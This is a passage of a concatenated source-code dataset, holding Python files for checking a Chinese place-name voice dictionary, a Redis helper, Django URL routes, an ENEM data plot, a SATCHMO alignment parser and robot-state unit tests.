road\r\n\t\tif ffff.is_root():\r\n\t\t\tkiwiRecords = self._kiwiDataManager.fetch_record(fff['name'], ff['name'], f['name'], self['name'])\r\n\t\t\treturn kiwiRecords\r\n\t\t# error\r\n\t\traise KeyError()\r\n\t\r\n\tdef fetch_kiwi_record(self):\r\n\t\tif self._kiwiRecord != None:\r\n\t\t\treturn self._kiwiRecord\r\n\t\trds = self._fetch_kiwi_record()\r\n\t\tif len(rds) == 1:\r\n\t\t\treturn rds[0]\r\n\t\tfor r in rds:\r\n\t\t\tif r['offset'] == int(self['offset'], 16):\r\n\t\t\t\tif r['name'] != self['name']:\r\n\t\t\t\t\tlog.error(r' : Same name record error : %s', self.get_str())\r\n\t\t\t\tself._kiwiRecord = r\r\n\t\t\t\treturn r\r\n\t\tlog.warning(r' : %s : %s', self.get_father()['offset'], self['offset'])\r\n\t\traise KeyError()\r\n\t\r\n\tdef fetch_kiwi_frame(self):\r\n\t\tif self._kiwiFrame != None:\r\n\t\t\treturn self._kiwiFrame\r\n\t\t# root, process in DicRootItem\r\n\t\t#if self.is_root():\r\n\t\t#\treturn None\r\n\t\tf = self.get_father()\r\n\t\t# root -> province\r\n\t\tif f.is_root():\r\n\t\t\tself._kiwiFrame = self._kiwiDataManager.fetch_frame(self['name'])\r\n\t\t\treturn self._kiwiFrame\r\n\t\tff = f.get_father()\r\n\t\t# root -> province -> city\r\n\t\tif ff.is_root():\r\n\t\t\tself._kiwiFrame = self._kiwiDataManager.fetch_frame(f['name'], self['name'])\r\n\t\t\treturn self._kiwiFrame\r\n\t\tfff = ff.get_father()\r\n\t\t# root -> province -> city -> town\r\n\t\tif fff.is_root():\r\n\t\t\tself._kiwiFrame = self._kiwiDataManager.fetch_frame(ff['name'], f['name'], self['name'])\r\n\t\t\treturn self._kiwiFrame\r\n\t\tffff = fff.get_father()\r\n\t\t# error\r\n\t\traise KeyError()\r\n\t\r\n\tdef get_type(self):\r\n\t\t\"Return 'Sheng', 'ZhiXiaShi', 'Di', 'Xian', 'QuanYu', 'Lu'\\n\"\r\n\t\tif self._type != None:\r\n\t\t\treturn self._type\r\n\t\tif not self.has_child():\r\n\t\t\tself._type = 'Lu'\r\n\t\t\treturn self._type\r\n\t\tif self.get_father().is_root():\r\n\t\t\tif self['name'] == u'上海市' or self['name'] == u'北京市' or \\\r\n\t\t\t\t\tself['name'] == u'天津市' or self['name'] == u'重庆市':\r\n\t\t\t\tself._type = 'ZhiXiaShi'\r\n\t\t\telse:\r\n\t\t\t\tself._type = 'Sheng'\r\n\t\t\treturn self._type\r\n\t\tif self['name'].endswith(u'全域'):\r\n\t\t\tself._type = 'QuanYu'\r\n\t\t\treturn self._type\r\n\t\tfType = self.get_father().get_type()\r\n\t\tif fType == 'ZhiXiaShi':\r\n\t\t\tself._type = 'Qu'\r\n\t\t\treturn self._type\r\n\t\telif fType == 'Sheng':\r\n\t\t\tif len(self.get_children())==0:\r\n\t\t\t\tlog.error(r' : %s', self.get_str())\r\n\t\t\tif self.get_children()[0].has_child():\r\n\t\t\t\tself._type = 'Di'\r\n\t\t\t\treturn self._type\r\n\t\t\telse:\r\n\t\t\t\tself._type = 'Xian'\r\n\t\t\t\treturn self._type\r\n\t\tself._type = 'Xian'\r\n\t\treturn self._type\r\n\r\n\r\nclass DicRootItem(DicItem):\r\n\tdef __init__(self):\r\n\t\tlinestr = 'China\tNoPinYin\t0x80000001\t0x00000000\t0x00000000\t0x00000000\t0x0000\\r\\n'\r\n\t\tDicItem.__init__(self, linestr, None)\r\n\t\t\r\n\tdef check(self):\r\n\t\tpass\r\n\t\r\n\tdef check_recursively(self):\r\n\t\t\" Check recursively.\\n\"\r\n\t\tif self._checked:\r\n\t\t\treturn True\r\n\t\tself._checked = True\r\n\t\t# check children recursively\r\n\t\tresult = True\r\n\t\tfor child in self.get_children():\r\n\t\t\tif not child.check_recursively():\r\n\t\t\t\tresult = False\r\n\t\treturn result\r\n\t\r\n\tdef has_child(self):\r\n\t\treturn True\r\n\t\r\n\tdef is_root(self):\r\n\t\treturn True\r\n\t\r\n\tdef fetch_kiwi_record(self):\r\n\t\treturn None\r\n\t\r\n\tdef fetch_kiwi_frame(self):\r\n\t\tif self._kiwiFrame != None:\r\n\t\t\treturn self._kiwiFrame\r\n\t\tself._kiwiFrame = self._kiwiDataManager.fetch_frame()\r\n\t\treturn self._kiwiFrame\r\n\t\r\n\tdef get_type(self):\r\n\t\treturn 'China'\r\n\r\n\r\nclass DicItemChecker:\r\n\t\"\"\"Class to check dictionary item. \r\n\t\"\"\"\r\n\t# alphabets that might be found in text.\r\n\talphabets = set(u'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')\r\n\t# pinyin should only contains these characters\r\n\tpinyinChars = set(u'abcdefghijklmnopqrstuvwxyz /1234')\r\n\t\r\n\tdef __init__(self, dicItem):\r\n\t\t\"\"\" Constructor.\r\n\t\t\"\"\"\r\n\t\tself._dicItem = dicItem\r\n\t\tself._children_offset_indexed = None\r\n\t\tself._checked_another_name = False\r\n\t\tself._checked = False\r\n\r\n\tdef check(self, forceCheck = False):\r\n\t\t\"\"\"Check dictionary item.\r\n\t\t\"\"\"\r\n\t\tif self._checked:\r\n\t\t\treturn True\r\n\t\tself._checked = True\r\n\t\tif not forceCheck:\r\n\t\t\ttry:\r\n\t\t\t\tself._dicItem.fetch_kiwi_record()\r\n\t\t\texcept KeyError:\r\n\t\t\t\t#log.warning(r' : You should check it manually : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\t\treturn self._check_another_name()\r\n\t\t# check all the items\r\n\t\tr1 = self._check_1()\r\n\t\tr2 = self._check_2()\r\n\t\tr3 = self._check_3()\r\n\t\tr4 = self._check_4()\r\n\t\tr5 = self._check_5()\r\n\t\tr6 = self._check_6()\r\n\t\tr7 = self._check_7()\r\n\t\tr8 = self._check_8()\r\n\t\tr9 = self._check_9()\r\n\t\treturn r1 and r2 and r3 and r4 and r5 and r6 and r7 and r8 and r9\t\r\n\t\r\n\tdef _check_another_name(self):\r\n\t\t\"\"\"Check another name of the dictionary item.\r\n\t\t\"\"\"\r\n\t\tself._checked_another_name = True\r\n\t\tfor item in self._dicItem.get_father().get_children():\r\n\t\t\tif item['offset'] == self._dicItem['offset']:\r\n\t\t\t\ttry:\r\n\t\t\t\t\titem.fetch_kiwi_record()\r\n\t\t\t\texcept KeyError:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tif not self.is_another_name(item, self._dicItem):\r\n\t\t\t\t\tlog.warning(r' : not another name : %s', self._dicItem.get_str())\r\n\t\t\t\t\treturn False\r\n\t\t\t\tlog.info(r' : %s : %s : %s', \r\n\t\t\t\t\t\tself._dicItem.get_father()['nextLevelId'], \r\n\t\t\t\t\t\tself._dicItem.get_str(),\r\n\t\t\t\t\t\titem.get_str())\r\n\t\t\t\treturn DicItemChecker(item).check(True)\r\n\t\tlog.warning(r' : %s', self._dicItem.get_str())\r\n\t\treturn False\r\n\t\r\n\tdef is_another_name(self, r1, r2):\r\n\t\t\"\"\"Check if r1 is another of r2.\r\n\t\t\"\"\"\r\n\t\tif r1['nextLevelId'] != r2['nextLevelId'] \\\r\n\t\t\t\tor r1['nextLevelInfo'] != r2['nextLevelInfo'] \\\r\n\t\t\t\tor r1['offset'] != r2['offset'] \\\r\n\t\t\t\tor r1['voiceId'] != r2['voiceId'] \\\r\n\t\t\t\tor r1['nextLevelNum'] != r2['nextLevelNum']:\r\n\t\t\treturn False\r\n\t\telif r1['name'].find(r2['name']) >= 0 or r2['name'].find(r1['name']) >= 0:\r\n\t\t\treturn True\r\n\t\telif r1['name'].find(u'全域') >= 0 and r2['name'].find(u'全域') >= 0:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\t\r\n\tdef checked_another_name(self):\r\n\t\t\"\"\"Judge if another name has been checked\r\n\t\t\"\"\"\r\n\t\treturn self._checked_another_name;\r\n\t\r\n\tdef _check_1(self):\r\n\t\t\"\"\"Check the name.\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\r\n\tdef _check_2(self):\r\n\t\t\"\"\"Check pinyin.\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\tr1 = self._check_2_1()\r\n\t\tr2 = self._check_2_2();\r\n\t\tif not r1:\r\n\t\t\tlog.info(r' Alphabet text but not NoPinYin : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\tif not r2:\r\n\t\t\tlog.info(r' Pinyin contains other characters : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\tdef _check_3(self):\r\n\t\t\"\"\"Check next level id.\r\n\t\t\"\"\"\r\n\t\tr1 = self._check_3_1()\r\n\t\tr2 = self._check_3_2()\r\n\t\treturn r1 and r2\r\n\r\n\tdef _check_4(self):\r\n\t\t\"\"\"Check next level info.\r\n\t\t\"\"\"\r\n\t\tif not self._dicItem.has_child():\r\n\t\t\tif self._dicItem['nextLevelInfo'] != '0x00000001':\r\n\t\t\t\tlog.info(r' next level info : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\t\treturn False\r\n\t\t\treturn True\r\n\t\t\r\n\t\tret = True\r\n\t\tgetb = lambda x,n: bool(x>>n & 1)\r\n\t\tnextLevelInfo = int(self._dicItem['nextLevelInfo'], 16)\r\n\t\tbits = tuple(getb(nextLevelInfo, n) for n in range(32))\r\n\t\tfor n in range(7,32):\r\n\t\t\tif bits[n] != False:\r\n\t\t\t\tlog.info(' next level info : %s', self._dicItem.get_str())\r\n\t\t# check bit0\r\n\t\tfor item in self._dicItem.get_children():\r\n\t\t\ttype = item.get_type()\r\n\t\t\tif type == 'Sheng' or type == 'ZhiXiaShi':\r\n\t\t\t\tif bits[1] != True or bits[6] == True:\r\n\t\t\t\t\tlog.warning(r' : Sheng/ZhiXiaShi : %s', self._dicItem.get_str())\r\n\t\t\t\t\tret = False\r\n\t\t\telif type == 'Di':\r\n\t\t\t\tif bits[2] != True or bits[6] == True:\r\n\t\t\t\t\tlog.warning(r' next level info : Di : %s', self._dicItem.get_str())\r\n\t\t\t\t\tret = False\r\n\t\t\telif type == 'Xian' or type == 'Qu':\r\n\t\t\t\tif bits[3] != True or bits[6] == True:\r\n\t\t\t\t\tlog.warning(r' next level info : Xian : %s', self._dicItem.get_str())\r\n\t\t\t\t\tret = False\r\n\t\t\telif type == 'Lu':\r\n\t\t\t\tif bits[4] != True:\r\n\t\t\t\t\tlog.warning(r' next level info : Lu : %s', self._dicItem.get_str())\r\n\t\t\t\t\tret = False\r\n\t\t\telif type == 'QuanYu':\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\traise KeyError()\r\n\t\tif self._dicItem.get_type() == 'QuanYu':\r\n\t\t\tif bits[6] != True:\r\n\t\t\t\tlog.warning(r' next level info : QuanYu Road Check Error : %s', self._dicItem.get_str())\r\n\t\t\t\tret = False\r\n\t\telse:\r\n\t\t\tif bits[6] == True:\r\n\t\t\t\tlog.warning(r' next level info : QuanYu Road Check Error : %s', self._dicItem.get_str())\r\n\t\t\t\tret = False\r\n\t\treturn ret\r\n\r\n\tdef _check_5(self):\r\n\t\t\"\"\"Check offset equals to kiwi data.\r\n\t\t\"\"\"\r\n\t\tif int(self._dicItem['offset'], 16) == \\\r\n\t\t\t\tself._dicItem.fetch_kiwi_record()['offset']:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tlog.warning(r' offset : %s : %s', self._dicItem.get_father()['nextLevelId'], self._dicItem.get_str())\r\n\t\t\treturn False\r\n\r\n\tdef _check_6(self):\r\n\t\t\"\"\"Check voice id.\r\n\t\t\"\"\"\r\n\t\tvoiceId = int(self._dicItem['voiceId'], 16)\r\n\t\tif voiceId == 0xffffffff:\r\n\t\t\tvoiceId = 0\r\n\t\tkVoiceId = self._dicItem.fetch_kiwi_record()['voiceId']\r\n\t\tif voiceId == kVoiceId:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tlog.warning(r' voice id : %s', self._dicItem.get_str())\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\tdef _check_7(self):\r\n\t\t\"\"\"Check the number of next level places.\r\n\t\t\"\"\"\r\n\t\tnum = int(self._dicItem['nextLevelNum'], 16)\r\n\t\trealNum = num\r\n\t\tret = True\r\n\t\tif not self._dicItem.has_child():\r\n\t\t\t# if num != 0 !!\r\n\t\t\tif num != len(self._dicItem.get_children()):\r\n\t\t\t\tret = False\r\n\t\telse:\r\n\t\t\trealNum = len(set(r['offset'] for r in self._dicItem.get_children()))\r\n\t\t\tif num == 0 or realNum == 0 or realNum > num:\r\n\t\t\t\tret = False\r\n\t\ttry:\r\n\t\t\tknum = len(self._dicItem.fetch_kiwi_frame())\r\n\t\texcept KeyError:\r\n\t\t\tknum = 0;\r\n\t\tif realNum != knum:\r\n\t\t\tret = False\r\n\t\tif not ret:\r\n\t\t\tlog.warning(r' next level number : %s', self._dicItem.get_str())\r\n\t\treturn ret\r\n\r\n\tdef _check_8(self):\r\n\t\t\"\"\"Check replacename, which is already checked.\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\r\n\tdef _check_9(self):\r\n\t\t\"\"\"Check others.\r\n\t\t\"\"\"\r\n\t\tr1 = self._check_9_1()\r\n\t\tr2 = self._check_9_2()\r\n\t\tr3 = self._check_9_3()\r\n\t\tr4 = self._check_9_4()\r\n\t\treturn r1 and r2 and r3 and r4\r\n\r\n\tdef _check_2_1(self):\r\n\t\t\"\"\"Check if text has alphabet, then pinyin should be \"NoPinYin\"\r\n\t\t\"\"\"\r\n\t\tdef has_alphabet(s):\r\n\t\t\tfor c in s:\r\n\t\t\t\tif c in self.alphabets:\r\n\t\t\t\t\treturn True\r\n\t\t\treturn False\r\n\t\tif has_alphabet(self._dicItem['name']):\r\n\t\t\tif self._dicItem['pinyin'] != u'NoPinYin':\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_2_2(self):\r\n\t\t\"\"\"Check characters in pinyin\r\n\t\t\"\"\"\r\n\t\tpinyin = self._dicItem['pinyin']\r\n\t\tif pinyin == 'NoPinYin':\r\n\t\t\treturn True\r\n\t\tfor c in pinyin:\r\n\t\t\tif not c in self.pinyinChars:\r\n\t\t\t\treturn False\r\n\t\treturn True\r\n\t\r\n\tdef _check_3_1(self):\r\n\t\t\"\"\"Check next level id and if next level file exists\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\ttry:\r\n\t\t\tk = d.fetch_kiwi_record()\r\n\t\texcept:\r\n\t\t\tlog.warning(r' : %s', d.get_str())\r\n\t\t\treturn False\r\n\t\tnextLevelId = d['nextLevelId']\r\n\t\tif not k.has_next_level():\r\n\t\t\tif nextLevelId != '0xFFFFFFFF':\r\n\t\t\t\tlog.warning(r' : %s', d.get_str())\r\n\t\t\t\t# do not return now, go on checking\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tif nextLevelId == '0xFFFFFFFF':\r\n\t\t\t\tlog.warning(r' : %s', d.get_str())\r\n\r\n\t\t# check file exists\r\n\t\tfilename = nextLevelId[2:]+'.txt'\r\n\t\tfilepath = os.path.join(d._folder, filename)\r\n\t\tif not os.path.isfile(filepath):\r\n\t\t\t# file not exist\r\n\t\t\tlog.warning(r' : %s', d.get_str())\r\n\t\t\treturn False\r\n\t\treturn True\r\n\r\n\tdef _check_3_2(self):\r\n\t\t\"\"\"Check if [next level id] corresponds with higher-level\r\n\t\t\"\"\"\r\n\t\td = self._dicItem\r\n\t\t# road, checked in check_3_1\r\n\t\tif not d.has_child():\r\n\t\t\treturn True\r\n\t\t# province\r\n\t\ttype = d.get_type()\r\n\t\tfId = d.get_father()['nextLevelId']\r\n\t\tId = d['nextLevelId']\r\n\t\t\r\n\t\tifId = int(fId, 16)\r\n\t\tiId = int(Id, 16)\r\n\t\tif fId != '0x80000001':\r\n\t\t\tif ifId & iId != ifId or ifId | iId != iId or ifId == iId:\r\n\t\t\t\tlog.warning(r' : %s', d.get_str())\r\n\r\n\t\tif type == 'Sheng' or type == 'ZhiXiaShi':\r\n\t\t\tif re.match(r'0x8[\\dA-F]{2}00000', Id) and Id != '0x80000000':\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tlog.warning(r' : Sheng/ZhiXiaShi : %s', d.get_str())\r\n\t\t\t\treturn False\r\n\t\telif type == 'Di':\r\n\t\t\tif re.match(fId[:5] + r'[\\dA-F]{2}000', Id) and Id != fId:\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tlog.warning(r' : Di : %s', d.get_str())\r\n\t\t\t\treturn False\r\n\t\telif type == 'Xian' or type == 'Qu':\r\n\t\t\tif re.match(fId[:7] + r'[\\dA-F]{3}', Id) and Id != fId:\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tlog.warning(r' : Xian/Qu : %s', d.get_str())\r\n\t\t\t\treturn False\r\n\t\telif type == 'QuanYu':\r\n\t\t\tif Id[-3:] != '001' or Id == fId:\r\n\t\t\t\tlog.warning(r' : QuanYu : %s', d.get_str())\r\n\t\t\treturn True\r\n\t\r\n\tdef _check_9_1(self):\r\n\t\t\"\"\"Check if all fields exists in each item.\r\n\t\tAlready checked in DicItem#get_children\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\t\r\n\tdef _check_9_2(self):\r\n\t\t\"\"\"Check dictionary format.\r\n\t\tAlready checked in DicItem#get_children\r\n\t\t\"\"\"\r\n\t\treturn True\r\n\t\r\n\tdef _check_9_3(self):\r\n\t\t\"\"\"Check if there are repeated next level info or voice id.\r\n\t\tReplace names are checked specially.\r\n\t\t@retval True: no repeated next level id or voice id.\r\n\t\t@retval False: has repeated next level id or voice id.\r\n\t\t\"\"\"\r\n\t\tif not self._dicItem.has_child():\r\n\t\t\treturn True\r\n\t\tRs = self._dicItem.get_children()\r\n\t\tret = True\r\n\t\tfor r in Rs:\r\n\t\t\tid = r['nextLevelId']\r\n\t\t\tif id == '0xFFFFFFFF':\r\n\t\t\t\tcontinue\r\n\t\t\tsameIdRs = filter(lambda rt:rt['nextLevelId']==id, Rs)\r\n\t\t\tif len(sameIdRs) != 1:\r\n\t\t\t\tfor r in sameIdRs[1:]:\r\n\t\t\t\t\tif not self.is_another_name(r, sameIdRs[0]):\r\n\t\t\t\t\t\tlog.warning(r' : %s : %s : %d', self._dicItem.get_str(), id, len(sameIdRs))\r\n\t\t\t\t\t\tret = False\r\n\t\tfor r in Rs:\r\n\t\t\tvid = r['voiceId']\r\n\t\t\tif vid == '0xFFFFFFFF':\r\n\t\t\t\tcontinue\r\n\t\t\tsameVidRs = filter(lambda rt:rt['voiceId']==vid, Rs)\r\n\t\t\tif len(sameVidRs) != 1:\r\n\t\t\t\tfor r in sameVidRs[1:]:\r\n\t\t\t\t\tif not self.is_another_name(r, sameIdRs[0]):\r\n\t\t\t\t\t\tlog.warning(r' : %s : %s : %d', self._dicItem.get_str(), id, len(sameVidRs))\r\n\t\t\t\t\t\tret = False\r\n\t\treturn ret\r\n\t\r\n\tdef _check_9_4(self):\r\n\t\t\"\"\"Check if all records in Kiwi exists in dictionary\r\n\t\t\"\"\"\r\n\t\tret = True\r\n\t\td = self._dicItem\r\n\t\tk = d.fetch_kiwi_record()\r\n\t\tnextLevelOffsets = tuple(int(c['offset'], 16) for c in self._dicItem.get_children()) \r\n\t\tif not k.has_next_level():\r\n\t\t\tif not d.has_child():\r\n\t\t\t\treturn True\r\n\t\t\tlog.warning(r' : %s', d.get_str())\r\n\t\t\treturn False\r\n\t\tfor k in d.fetch_kiwi_frame():\r\n\t\t\tif not k['offset'] in nextLevelOffsets:\r\n\t\t\t\tlog.warning(r' : %s : %x', self._dicItem.get_str(), k['offset'])\r\n\t\t\t\tret = False\r\n\t\treturn ret\r\n\r\n","sub_path":"pycode/VrDicCheck.py","file_name":"VrDicCheck.py","file_ext":"py","file_size_in_byte":20878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"576848327","text":"# -*- coding: utf-8 -*-\nimport redis\n\n\nclass RedisHelper:\n\n def __init__(self, host='127.0.0.1', port=6379):\n self.__conn = redis.Redis(host=host, port=port)\n self.chan_sub = 'message_pub' # 订阅-接受\n self.chan_pub = 'message_pub' # 发布\n self.messageList = 'MessageList' # 信息集\n\n def public(self, msg):\n \"\"\"\n 发布信息\n :param msg:\n :return:\n \"\"\"\n self.__conn.publish(self.chan_pub, msg)\n return True\n\n def subscribe(self):\n \"\"\"\n 接受信息\n :return:\n \"\"\"\n pub = self.__conn.pubsub()\n pub.subscribe(self.chan_sub)\n pub.parse_response()\n return pub\n\n def pop(self):\n \"\"\"\n 消息出栈\n :return:\n \"\"\"\n m = self.__conn.blpop(self.messageList)\n return m\n\n def push(self, msg):\n try:\n self.__conn.lpush(self.messageList, msg)\n return True\n except Exception as e:\n return str(e)\n\n\nif __name__ == '__main__':\n r = RedisHelper('127.0.0.1')\n","sub_path":"RedisServer/RedisHelper.py","file_name":"RedisHelper.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"424699074","text":"\"\"\"CataractProject URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.conf.urls import url\nfrom InformTable import views\n\nurlpatterns = [\n url(r'admin/', admin.site.urls),\n url(r'^postdiagnose/', views.postdiagnose),\n url(r'^patientslist/', views.showpatientlist),\n url(r'^editdiagnose/(?P[0-9]*)/edit$', views.editdiagnose, name=\"edit\"),\n url(r'^doctorlogin/', views.doctorlogin),\n url(r'^diagnose/(?P[0-9]*)/delete$', views.deletediagnose, name=\"delete\"),\n url(r'^doctorsignup/', views.doctorsignup),\n url(r'^doctorlogout/', views.doctorlogout)\n]\n","sub_path":"CataractProject/CataractProject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"637011477","text":"\"\"\"Data Mining - ENEM 2015.\"\"\"\n\nimport pandas as pd\nimport settings as st\n\nenem_2015_df = pd.read_csv(st.enem_2015_csv,\n encoding='latin-1',\n nrows=100)\n\noutput = enem_2015_df.groupby('NO_MUNICIPIO_RESIDENCIA').size()\n\ngraph = output.plot.bar(figsize=(15, 15))\ngraph.get_figure().savefig('teste.png')\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"297059373","text":"#!/usr/bin/env python\n\nimport os, sys, string, re, cPickle\nfrom Bio.SeqUtils import CheckSum\nfrom Bio import SeqIO\n\nuppercase_translation = string.maketrans(string.lowercase, string.uppercase)\ntrivial_translation = string.maketrans('', '')\nspecial_tree_char_translation = string.maketrans('(),[]', '_____')\ndotdash = '.-'\n\nid_re = re.compile('[^(:),]*')\nbranch_length_re = re.compile('[0-9]\\.[0-9e\\-]*')\n\nclass node:\n def __init__(self, seguid=None):\n self.children = set()\n self.leftId = None\n self.rightId = None\n if seguid:\n self.contained_seguids = set([seguid])\n else:\n self.contained_seguids = set()\n\n def addChild(self, child):\n self.children.add(child)\n self.contained_seguids = self.contained_seguids | child.contained_seguids\n\n def updateLeftId(self, leftId):\n self.leftId = leftId\n rightId = leftId + 1\n for child in self.children:\n rightId = child.updateLeftId(rightId)\n self.rightId = rightId\n return rightId + 1\n\n def readFromTreeString(self, tree_string, seguids, i):\n if i >= len(tree_string):\n return len(tree_string)\n if tree_string[i] == '(':\n while tree_string[i] != ')':\n child = node()\n i = child.readFromTreeString(tree_string, seguids, i+1)\n self.addChild(child)\n i += 1\n else:\n id = id_re.match(tree_string[i:]).group(0)\n i += len(id)\n self.seguid = seguids[id]\n self.contained_seguids = set([self.seguid])\n if i < len(tree_string) and tree_string[i] == ':':\n i += 1\n branch_length = branch_length_re.match(tree_string[i:]).group(0)\n i += len(branch_length)\n return i\n\n def updateAlignmentOffsetOfLeftId(self, alignment_offset_dict,\n alignment_offset_of_left_id):\n if len(self.contained_seguids) > 0:\n for seguid in self.contained_seguids:\n if seguid in alignment_offset_dict:\n if len(self.contained_seguids) in alignment_offset_dict[seguid]:\n alignment_offset_of_left_id[self.leftId] \\\n = alignment_offset_dict[seguid][len(self.contained_seguids)]\n break\n for child in self.children:\n child.updateAlignmentOffsetOfLeftId(alignment_offset_dict,\n alignment_offset_of_left_id)\n\ndef get_seguids_of_ids(work_path):\n seguids = {}\n ids_of_seguid = {}\n f = open(os.path.join(work_path, \"input_unaligned.fasta\"))\n for record in SeqIO.parse(f, \"fasta\"):\n id = record.id.replace(':', '_')\n additional_id = id.translate(special_tree_char_translation, '')\n seguid = CheckSum.seguid(record.seq)\n seguids[id] = seguid\n seguids[additional_id] = seguid\n # Don't put the additional_id in ids_of_seguid, as views.py expects there\n # to be one id per leaf.\n if seguid not in ids_of_seguid:\n ids_of_seguid[seguid] = set()\n ids_of_seguid[seguid].add(id)\n f.close()\n for seguid in ids_of_seguid:\n id_list = list(ids_of_seguid[seguid])\n id_list.sort()\n ids_of_seguid[seguid] = id_list\n f = open(os.path.join(work_path, \"ids_of_seguid.pkl\"), \"w\")\n cPickle.dump(ids_of_seguid, f)\n f.close()\n return (seguids, ids_of_seguid)\n\ndef parse_tree(work_path):\n seguids, ids_of_seguid = get_seguids_of_ids(work_path)\n f = open(os.path.join(work_path, \"satchmo_tree.newick\"))\n tree_string = f.read()\n f.close()\n tree_string = tree_string.translate(trivial_translation, string.whitespace)\n root = node()\n root.readFromTreeString(tree_string, seguids, 0)\n root.updateLeftId(1)\n return root\n\ndef parse_smo(work_path):\n f = open(os.path.join(work_path, \"satchmo.smo\"))\n alignment_offset_dict = {}\n records = set()\n current_header = \"\"\n current_sequence = \"\"\n alignmentOffset = 0\n alignmentNumBytes = 0\n withinAlignment = False\n start_of_line = f.tell()\n line = f.readline()\n while line:\n if line.rstrip() == 'alignment':\n # skip past the line with the curly brace\n f.readline()\n # the next line is the start of the alignment\n alignmentOffset = f.tell()\n withinAlignment = True\n elif line.rstrip() == '//':\n if current_sequence != '':\n seguid = CheckSum.seguid(current_sequence)\n records.add( seguid )\n alignmentNumBytes = start_of_line - alignmentOffset\n for seguid in records:\n if seguid not in alignment_offset_dict:\n alignment_offset_dict[seguid] = {}\n alignment_offset_dict[seguid][len(records)] \\\n = (alignmentOffset, alignmentNumBytes)\n records = set()\n current_header = \"\"\n current_sequence = \"\"\n withinAlignment = False\n elif withinAlignment:\n if len(line) > 0 and line[0] == '>':\n if current_sequence != '':\n seguid = CheckSum.seguid(current_sequence)\n records.add( seguid )\n current_header = line[1:].rstrip()\n current_sequence = \"\"\n else:\n current_sequence = current_sequence + \\\n line.strip().translate(uppercase_translation, dotdash)\n start_of_line = f.tell()\n line = f.readline()\n f.close()\n return alignment_offset_dict\n\ndef find_alignment_offset_of_left_id(work_path):\n alignment_offset_dict = parse_smo(work_path)\n root = parse_tree(work_path)\n alignment_offset_of_left_id = {}\n root.updateAlignmentOffsetOfLeftId(alignment_offset_dict,\n alignment_offset_of_left_id)\n return alignment_offset_of_left_id\n\n\ndef main():\n if len(sys.argv) < 2:\n path = os.getcwd()\n else:\n path = sys.argv[1]\n\n alignment_offset_of_left_id = find_alignment_offset_of_left_id(path)\n f = open(os.path.join(path, 'alignment_offset_of_left_id.pkl'), \"w\")\n cPickle.dump(alignment_offset_of_left_id, f)\n f.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"pfacts003/satchmo/parse_smo.py","file_name":"parse_smo.py","file_ext":"py","file_size_in_byte":5723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"476805520","text":"import unittest\n\n# datatypes\nimport PyKDL as kdl\nfrom robot_skills.util.kdl_conversions import VectorStamped\n\n# Robot Skills\nfrom robot_skills.mockbot import Mockbot\nfrom robot_skills.util.entity import Entity\nfrom robot_skills.util.volume import BoxVolume\n\n# Robot Smach States\nfrom robot_smach_states.perception import LookAtArea, LookAtEntity\nimport robot_smach_states.util.designators as ds\n\n\nclass TestLookAtEntity(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.robot = Mockbot()\n\n def setUp(self):\n self.entity = Entity(\"12345\", \"dummy\", \"map\",\n kdl.Frame(kdl.Rotation.RPY(1, 0, 0),\n kdl.Vector(3, 3, 3)),\n None, {}, None, 0)\n\n def test_look_at_enity_looks_at_correct_point(self):\n \"\"\"Test that the robot looks at the center point of the named area, w.r.t. the frame of the entity\"\"\"\n entity_ds = ds.Designator(self.entity)\n\n state = LookAtEntity(self.robot, entity_ds, waittime=0)\n\n state.execute()\n\n vs = VectorStamped(0, 0, 0, \"12345\")\n\n self.robot.head.look_at_point.assert_called_with(vs)\n\n\nclass TestLookAtArea(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.robot = Mockbot()\n\n def 